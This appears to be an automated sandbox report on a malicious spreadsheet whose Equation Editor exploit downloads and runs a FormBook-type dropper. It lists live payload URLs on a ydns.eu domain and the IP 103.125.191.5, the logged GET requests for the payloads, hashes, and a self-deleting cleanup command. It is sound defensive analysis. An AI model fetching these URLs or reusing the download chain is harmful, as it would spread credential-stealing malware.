      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      Source | Detection | Scanner | Label | Link
      http://103.125.191.5/bin_xMjelaYnr43.binq~f | 0% | Avira URL Cloud | safe |
      http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe |
      http://103.125.191.5/bin_xMjelaYnr43.binY~f | 0% | Avira URL Cloud | safe |
      http://www.%s.com | 0% | URL Reputation | safe |
      http://www.%s.comPA | 0% | URL Reputation | safe |
      http://%s.com | 0% | URL Reputation | safe |
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe |
      http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe | 1% | Virustotal | | Browse
      http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe | 100% | Avira URL Cloud | malware |
      http://treyresearch.net | 0% | URL Reputation | safe |
      http://103.125.191.5/bin_xMjelaYnr43.bin | 0% | Avira URL Cloud | safe |

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu | 103.125.191.5 | true | true | | unknown

        Contacted URLs

        Name | Malicious | Antivirus Detection | Reputation
        http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe | true | 1%, Virustotal; Avira URL Cloud: malware | unknown
        http://103.125.191.5/bin_xMjelaYnr43.bin | true | Avira URL Cloud: safe | unknown

        URLs from Memory and Binaries

        Name | Source | Malicious | Antivirus Detection | Reputation
        http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp | false | | high
        http://103.125.191.5/bin_xMjelaYnr43.binq~f | vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
        http://www.icra.org/vocabulary/. | vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmp | false | | high
        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000007.00000000.2332531261.0000000000260000.00000004.00000020.sdmp | false | | high
        http://103.125.191.5/bin_xMjelaYnr43.binY~f | vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
        http://www.%s.com | explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp | false | URL Reputation: safe | low
        http://www.piriform.com/ccleaner | explorer.exe, 00000007.00000000.2337234886.00000000039F4000.00000004.00000001.sdmp | false | | high
        http://www.%s.comPA | vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmp | false | URL Reputation: safe | low
        http://%s.com | explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp | false | URL Reputation: safe | low
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true | vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
        http://treyresearch.net | explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
        http://auto.search.msn.com/response.asp?MT= | explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp | false | | high

                  Contacted IPs


                  Public

                  IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                  103.125.191.5 | unknown | Viet Nam | | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true

                  General Information

                  Joe Sandbox Version:31.0.0 Red Diamond
                  Analysis ID:320235
                  Start date:19.11.2020
                  Start time:07:41:52
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 9m 38s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:Unique food order.xlsx
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:11
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.expl.evad.winXLSX@10/3@1/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 16.3% (good quality ratio 13%)
                  • Quality average: 54.5%
                  • Quality standard deviation: 34.3%
                  HCA Information:
                  • Successful, ratio: 72%
                  • Number of executed functions: 244
                  • Number of non-executed functions: 25
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  Time | Type | Description
                  07:43:12 | API Interceptor | 68x Sleep call for process: EQNEDT32.EXE modified
                  07:44:20 | API Interceptor | 202x Sleep call for process: vbc.exe modified
                  07:44:49 | API Interceptor | 72x Sleep call for process: NAPSTAT.EXE modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:downloaded
                  Size (bytes):61440
                  Entropy (8bit):4.914988096771549
                  Encrypted:false
                  SSDEEP:768:t4cVBi/uynLCBod2XkqAy6dH4ErjAxvWhT5z78gdseDd4kyKz:tO/uB953eg9ylzogB+kl
                  MD5:C05EEE88F0B57E853996957D6523397B
                  SHA1:FC16FA4AB9A88F7E2405EB9A77D168D9C1B7C8D3
                  SHA-256:7E70E44956CDB045FD7B5C66ECA50996900059FD8851AA76BE19A5DD492C6918
                  SHA-512:9441441F5D6D84E4C674E77013CE1BF562173195DE9AC1C05463BCF0BBDA51345B6AF219B279F93E7D2DF84BBFB22D11906B8A145F1FE98EFAF3A28786BE220F
                  Malicious:true
                  Reputation:low
                  IE Cache URL:http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i......................*..............Rich....................PE..L......P.....................0....................@............................................................................<...........................................................................0...0....................................text...`........................... ..`.data...............................@....rsrc...............................@..@.[#X.......I#...........USER32.DLL.MSVBVM60.DLL.........................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\Desktop\~$Unique food order.xlsx
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):330
                  Entropy (8bit):1.4377382811115937
                  Encrypted:false
                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                  Malicious:true
                  Reputation:moderate, very likely benign file
                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  C:\Users\Public\vbc.exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):61440
                  Entropy (8bit):4.914988096771549
                  Encrypted:false
                  SSDEEP:768:t4cVBi/uynLCBod2XkqAy6dH4ErjAxvWhT5z78gdseDd4kyKz:tO/uB953eg9ylzogB+kl
                  MD5:C05EEE88F0B57E853996957D6523397B
                  SHA1:FC16FA4AB9A88F7E2405EB9A77D168D9C1B7C8D3
                  SHA-256:7E70E44956CDB045FD7B5C66ECA50996900059FD8851AA76BE19A5DD492C6918
                  SHA-512:9441441F5D6D84E4C674E77013CE1BF562173195DE9AC1C05463BCF0BBDA51345B6AF219B279F93E7D2DF84BBFB22D11906B8A145F1FE98EFAF3A28786BE220F
                  Malicious:true
                  Reputation:low
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i......................*..............Rich....................PE..L......P.....................0....................@............................................................................<...........................................................................0...0....................................text...`........................... ..`.data...............................@....rsrc...............................@..@.[#X.......I#...........USER32.DLL.MSVBVM60.DLL.........................................................................................................................................................................................................................................................................................................................................................................................................

                  Static File Info

                  General

                  File type:CDFV2 Encrypted
                  Entropy (8bit):7.996651012349256
                  TrID:
                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                  File name:Unique food order.xlsx
                  File size:2303488
                  MD5:f2cd263042fce1a4c2cbeed5f1676429
                  SHA1:608334d6c55e50f3447f865bca59e05b7b60e0cb
                  SHA256:f2f88e0287d17638c5d902a49d19b2c4e989dc2a511411ce959c91b642fb9359
                  SHA512:847ab0270c6f64d46de8af8039b2092dc7f7978356ff7d5ddb38f7d87c495aa826f4af7d3f4c02547e5e9dd99cd60ca2ee5e5b85b3aa8f2cea3e68ab337ffcca
                  SSDEEP:49152:sZDn4BcTs7rQj4qUoruUVl7/+jfylwvOcvAg0N+MWSmc:NB6mEj4qUojLmjf/vD0N+3Bc
                  File Content Preview:........................>...................$...........................................................................z.......|.......~...............z.......|.......~...............z.......|.......~...............z......................................

                  File Icon

                  Icon Hash:e4e2aa8aa4b4bcb4

                  Static OLE Info

                  General

                  Document Type:OLE
                  Number of OLE Files:1

                  OLE File "Unique food order.xlsx"

                  Indicators

                  Has Summary Info:False
                  Application Name:unknown
                  Encrypted Document:True
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:False
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:
                  Flash Objects Count:
                  Contains VBA Macros:False

                  Streams

                  Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                  Entropy:2.73637206947
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                  Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                  Entropy:2.7597816111
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                  Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                  Entropy:3.13335930328
                  Base64 Encoded:False
                  Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                  Entropy:2.79079600998
                  Base64 Encoded:False
                  Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                  Stream Path: EncryptedPackage, File Type: data, Stream Size: 2281000
                  Entropy:7.99991703704
                  Base64 Encoded:True
                  Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                  Entropy:4.51880650455
                  Base64 Encoded:False
                  Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . 9 # . u . @ . W . & . . . . e . " . . . . . h . . V . . . . . . e } . % h . . n . * . . k . % . . M h . u . " 3 - . ? . . . } .

                  Network Behavior

                  Snort IDS Alerts

                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                  11/19/20-07:43:18.523521 | TCP | 2022550 | ET TROJAN Possible Malicious Macro DL EXE Feb 2016 | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  11/19/20-07:44:36.030811 | TCP | 2018752 | ET TROJAN Generic .bin download from Dotted Quad | 49166 | 80 | 192.168.2.22 | 103.125.191.5

                  Network Port Distribution

                  TCP Packets

                  Nov 19, 2020 07:44:38.630676031 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630702972 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.630722046 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.630740881 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630774021 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630788088 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.630824089 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.630855083 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.630901098 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.954948902 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955049038 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955104113 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955132008 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955148935 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955152988 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955199957 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955254078 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955274105 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955303907 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955348969 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955406904 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955421925 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955452919 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955492020 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955538034 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955558062 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955605030 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955624104 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955667973 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955688953 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955755949 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955820084 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955830097 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955878973 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955910921 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:38.955930948 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:38.955952883 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:41.871069908 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:41.871176958 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:55.907449961 CET4916680192.168.2.22103.125.191.5

                  UDP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Nov 19, 2020 07:43:18.152446032 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                  Nov 19, 2020 07:43:18.188976049 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22

                  DNS Queries

                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                  Nov 19, 2020 07:43:18.152446032 CET | 192.168.2.22 | 8.8.8.8 | 0xe410 | Standard query (0) | wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu | A (IP address) | IN (0x0001)

                  DNS Answers

                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                  Nov 19, 2020 07:43:18.188976049 CET | 8.8.8.8 | 192.168.2.22 | 0xe410 | No error (0) | wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu | | 103.125.191.5 | A (IP address) | IN (0x0001)

                  HTTP Request Dependency Graph

                  • wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
                  • 103.125.191.5

                  HTTP Packets

                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.22 | 49165 | 103.125.191.5 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 19, 2020 07:43:18.523520947 CET | 0 | OUT | GET /worksdoc/svchost.exe HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
                  Connection: Keep-Alive
                  Nov 19, 2020 07:43:18.839695930 CET | 2 | IN | HTTP/1.1 200 OK
                  Date: Thu, 19 Nov 2020 06:43:17 GMT
                  Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                  Last-Modified: Wed, 18 Nov 2020 21:48:32 GMT
                  ETag: "f000-5b4689298b6b3"
                  Accept-Ranges: bytes
                  Content-Length: 61440
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/x-msdownload


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.22 | 49166 | 103.125.191.5 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 19, 2020 07:44:36.030811071 CET | 66 | OUT | GET /bin_xMjelaYnr43.bin HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: 103.125.191.5
                  Cache-Control: no-cache
                  Nov 19, 2020 07:44:36.356791973 CET | 67 | IN | HTTP/1.1 200 OK
                  Date: Thu, 19 Nov 2020 06:44:35 GMT
                  Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                  Last-Modified: Wed, 18 Nov 2020 21:20:27 GMT
                  ETag: "2d640-5b4682e21b662"
                  Accept-Ranges: bytes
                  Content-Length: 185920
                  Content-Type: application/octet-stream


                  Code Manipulations

                  Statistics

                  CPU Usage

                  Memory Usage

                  High Level Behavior Distribution

                  Behavior

                  System Behavior

                  General

                  Start time: 07:42:52
                  Start date: 19/11/2020
                  Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit): false
                  Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase: 0x13ff00000
                  File size: 27641504 bytes
                  MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high

                  General

                  Start time: 07:43:12
                  Start date: 19/11/2020
                  Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit): true
                  Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Imagebase: 0x400000
                  File size: 543304 bytes
                  MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high

                  General

                  Start time: 07:43:15
                  Start date: 19/11/2020
                  Path: C:\Users\Public\vbc.exe
                  Wow64 process (32bit): true
                  Commandline: 'C:\Users\Public\vbc.exe'
                  Imagebase: 0x400000
                  File size: 61440 bytes
                  MD5 hash: C05EEE88F0B57E853996957D6523397B
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: Visual Basic
                  Reputation: low

                  General

                  Start time: 07:44:20
                  Start date: 19/11/2020
                  Path: C:\Users\Public\vbc.exe
                  Wow64 process (32bit): true
                  Commandline: 'C:\Users\Public\vbc.exe'
                  Imagebase: 0x400000
                  File size: 61440 bytes
                  MD5 hash: C05EEE88F0B57E853996957D6523397B
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation: low

                  General

                  Start time: 07:44:35
                  Start date: 19/11/2020
                  Path: C:\Windows\explorer.exe
                  Wow64 process (32bit): false
                  Commandline:
                  Imagebase: 0xffca0000
                  File size: 3229696 bytes
                  MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: moderate

                  General

                  Start time: 07:44:45
                  Start date: 19/11/2020
                  Path: C:\Windows\SysWOW64\autoconv.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Windows\SysWOW64\autoconv.exe
                  Imagebase: 0xa90000
                  File size: 679424 bytes
                  MD5 hash: 09D786401F6CA6AEB16B2811B169F944
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: moderate

                  General

                  Start time: 07:44:45
                  Start date: 19/11/2020
                  Path: C:\Windows\SysWOW64\NAPSTAT.EXE
                  Wow64 process (32bit): true
                  Commandline: C:\Windows\SysWOW64\NAPSTAT.EXE
                  Imagebase: 0x960000
                  File size: 279552 bytes
                  MD5 hash: 4AF92E1821D96E4178732FC04D8FD69C
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, Author: Florian Roth
                  Reputation: moderate

                  General

                  Start time: 07:44:49
                  Start date: 19/11/2020
                  Path: C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit): true
                  Commandline: /c del 'C:\Users\Public\vbc.exe'
                  Imagebase: 0x4a920000
                  File size: 302592 bytes
                  MD5 hash: AD7B9C14083B52BC532FBA5948342B98
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high

                  Disassembly

                  Code Analysis


                    Executed Functions

                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID: W.E$.FBu$1.!T$ntdll
                    • API String ID: 1029625771-399834001
                    • Opcode ID: df1d7e25fe2405ffd91c6f2229c7137afdf75735c254c4b97c50faf073f8e9f5
                    • Instruction ID: 7e8d8d0f005582569f5ae37e2641913730cfcceeb44d87fe5af0612d0895214c
                    • Opcode Fuzzy Hash: df1d7e25fe2405ffd91c6f2229c7137afdf75735c254c4b97c50faf073f8e9f5
                    • Instruction Fuzzy Hash: E802D234740305EAEF3F6E648CA57EE2256DF4E750FA5412AFC869B5C5C7B5C8C68202
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                      • Part of subcall function 00315A6C: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00315609,00000040,00310570,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00315A87
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                    • String ID: 1.!T
                    • API String ID: 449006233-3147410236
                    • Opcode ID: 0dfa85546250b16a6c5da4e598c3570d59c47ef42f48d5360ab09f9800666a5b
                    • Instruction ID: c6aa10b5175b6378013766fcc7a0ba37ddb9425383b4dfb60d3d9ebc1ff1174c
                    • Opcode Fuzzy Hash: 0dfa85546250b16a6c5da4e598c3570d59c47ef42f48d5360ab09f9800666a5b
                    • Instruction Fuzzy Hash: 6C329A70740301EEEB2A9F24CDD5BEA77A2EF5A360F558229ED958B2C1D37588C1C712
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID: 7HoB$DV
                    • API String ID: 1029625771-80660350
                    • Opcode ID: ca13a13595e608c10fbbadc0993d19df2e946924c5c70a6849d37526f0df436c
                    • Instruction ID: a749e6cb28559a4fdbc28d0dae975dbdc6f2cf951f3111f8afa93b22c4ec30f1
                    • Opcode Fuzzy Hash: ca13a13595e608c10fbbadc0993d19df2e946924c5c70a6849d37526f0df436c
                    • Instruction Fuzzy Hash: 92E16670740702EFEB199F28CC90BE6B3A5BF09350F558229ED9997681D734E8D58BC1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationThread
                    • String ID: 1.!T
                    • API String ID: 4046476035-3147410236
